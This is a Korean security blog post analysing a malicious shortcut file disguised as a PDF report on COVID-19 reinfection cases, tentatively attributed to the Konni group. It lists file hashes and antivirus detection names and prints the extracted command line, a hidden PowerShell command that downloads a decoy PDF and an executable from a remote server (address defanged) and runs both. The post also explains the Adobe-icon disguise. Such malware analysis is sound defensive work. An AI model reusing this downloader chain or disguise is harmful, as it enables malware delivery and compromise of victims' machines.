꿈을꾸는 파랑새

오늘은 북한 해킹 단체 Konni(코니) 만든 것으로 추정되는 악성코드 국내코로나 19 재감염사례현황.pdf.lnk(2024.10.5)에 대해 글을 적어 보겠습니다. 여기서 어디까지는 Konni(코니) 인것 같다는 것이 공식이 아닙니다.
코로나 19 는 2019년 11월 중국 후베이성 우한시에서 처음으로 발생하여 보고된 새로운 유형의 변종 코로나바이러스인 SARS-CoV-2에 의해 발병한 급성 호흡기 전염병입니다. 아무튼, 현재는 블루 단계 관심을 두세요. 단계입니다.
일단 해당 악성코드 이름을 보면 국내코로나19재감염사례현황 인 것을 보면 의학 관련 종사자 분들이 타겟이 아닐까 생각이 됩니다. 어디까지나 私見 입니다.최근 코로나 19 가 유행을 한다고 해서 아마 유포가 되는즉 합니다.
먼저 해쉬값 입니다.
파일명:국내코로나19재감염사례현황.pdf.lnk
사이즈:127 MB
MD5:1f96ef9c871f24720c7c05055ad99c78
SHA-1:02cf6a1a8b6a06eaa92d3f0302a56507e0bd55b3
SHA-256:b9766b61ab05673e2945476d2cf5209345c06edbb4a90d6885de96ec03ff69b9
입니다. 이번에는 파일 크기가 100메가 이상 넘어가는 것을 확인할 수가 있습니다.

악성코드 에 포함된 파워셀 코드
악성코드 에 포함된 파워셀 코드

일단 02 01로 인생 복잡하게 더미 파일로 돼 있는 것을 확인할 수가 있습니다.
실행하는 코드는 다음과 같습니다.

StringData
{
    namestring: not p(r)esent
    relativepath: ..\..\..\..\Windows\SysWOW64\cmd(.)exe
    workingdir: not present
    commandlinearguments: /c powershell (-)windowstyle hidden -co(m)mand 
    "Set(-)Location -Path 'C:\Users\Public'; Invoke-WebR(e)quest -Uri \
    'hxxp://172(.)22(.)224(.)1:7777/123.pdf' -OutFile 'C:\Users\Public
    \국내코로나19재감염사례현황(.)pdf'; Invoke-WebRequest -Uri 
    'hxxp://172(.)22(.)224.1:7777/1(.)exe' -OutFile 'C:\Users\Public\1.exe'
    ; Start-Process -FilePath 'C:\Users\Public\국내코로나19재감염사례현황.pdf';
    Start-Process -FilePath 'C:\Users\Public\1.exe'"
    iconlocation: C:\Program Files\Adobe\Acrobat DC\Acrobat\CrashReporter
    Resources\AdobeLogo(.)ico
}

악성코드 분석

powershell -windowstyle hidden:PowerShell 명령을 실행할 때 창을 숨기는 명령어 사용자에게 명령이 실행 중임을 숨기기 위한 목적
Set-Location -Path 'C:\Users\Public':C:\Users\Public 디렉터리로 작업 경로를 설정하는 명령 해당 경로는 모든 사용자에게 접근 가능하여 악성 파일을 저장하는 데 자주 사용 곳입니다.
Invoke-WebRequest:PowerShell의 웹 요청 명령으로 원격 서버에서 파일을 다운로드하는 데 사용
첫 번째 파일:hxxp://172(.)22(.)224(.)1:7777/123(.)pdf에서 C:\Users\Public\국내코로나19재감염사례현황.pdf로 다운로드
두 번째 파일:hxxp://172(.)22(.)224(.)1:7777/1(.)exe에서 C:\Users\Public\1.exe로 다운로드
해당 1.exe 파일이 백도어 일 가능성이 크게 생각을 합니다. 서버가 터져서 자세한 것은 문석 못했습니다.
Start-Process -FilePath:다운로드된 파일들을 실행
첫 번째로 국내코로나19재감염사례현황.pdf 파일을 실행하여 디코이 파일을 보게 합니다. 해당 PDF는 악성 PDF가 아니더라도 신뢰감을 주려는 것일 수 있습니다.
두 번째로 1(.)exe를 실행<-이게 핵심
3.iconlocation: C:\Program Files\Adobe\Acrobat DC\Acrobat\CrashReporterResources\AdobeLogo.ico
해당 경로는 Adobe Acrobat 프로그램과 관련된 아이콘 파일을 나타 내며 해당 아이콘 파일을 지정함으로써 악성 파일이 Adobe와 관련된 것처럼 보이게 하려는 의도가 있을 수 있습니다. 즉 사용자의 의심을 피하기 위한 사회 공학적 기법
당연히 저같이 어도비 PDF 를 안 하는 사람들은 빈 파일 모양으로 표시될 것입니다.

원격 서버에 연결 할수 없습니다.사이트 폭파
원격 서버에 연결 할수 없습니다.사이트 폭파


AhnLab-V3:Trojan/LNK.Powershell.XSG12
AliCloud:Trojan:Multi/Powedon.c
ALYac:Trojan.PowerShell.LNK.Gen.14
Arcabit:Trojan.PowerShell.LNK.Gen.14 [many]
Avast:LNK:Agent-IL [Trj]
AVG:LNK:Agent-IL [Trj]
BitDefender:Trojan.PowerShell.LNK.Gen.14
CTX:Lnk.unknown.boxter
Emsisoft:Trojan.PowerShell.LNK.Gen.14 (B)
ESET-NOD32:A Variant Of Generik.BRHTYFC
Fortinet:LNK/Agent.D!tr
GData:Trojan.PowerShell.LNK.Gen.14
Google:Detected
Huorong:TrojanDownloader/LNK.Maloader.a
Kaspersky:HEUR:Trojan.Multi.Powedon.c
Lionic:Trojan.WinLNK.PowerShell.4!c
Rising:Downloader.PowerShell/LNK!1.E77F (CLASSIC)
SentinelOne (Static ML):Static AI - Suspicious LNK
Sophos:Mal/DownLnk-D
Symantec:Scr.Mallnk!gen13
Tencent:Win32.Trojan.Powedon.Hplw
Trellix (HX):Trojan.PowerShell.LNK.Gen.14
TrendMicro:HEUR_LNKEXEC.A
Varist:LNK/ABRisk.FBRA-8
VBA32:Trojan.Link.Crafted
VIPRE:Trojan.PowerShell.LNK.Gen.14
WithSecure:Trojan-Downloader:W32/Kataja.C
ZoneAlarm by Check Point:HEUR:Trojan.Multi.Powedon.c
Zoner:Probably Heur.LNKScript
즉 해당 부분은 의료 관련 종사자들을 목표로 하는 것을 추정되면 아무튼 기본적인 보안수칙을 잘 지키시길 바랍니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band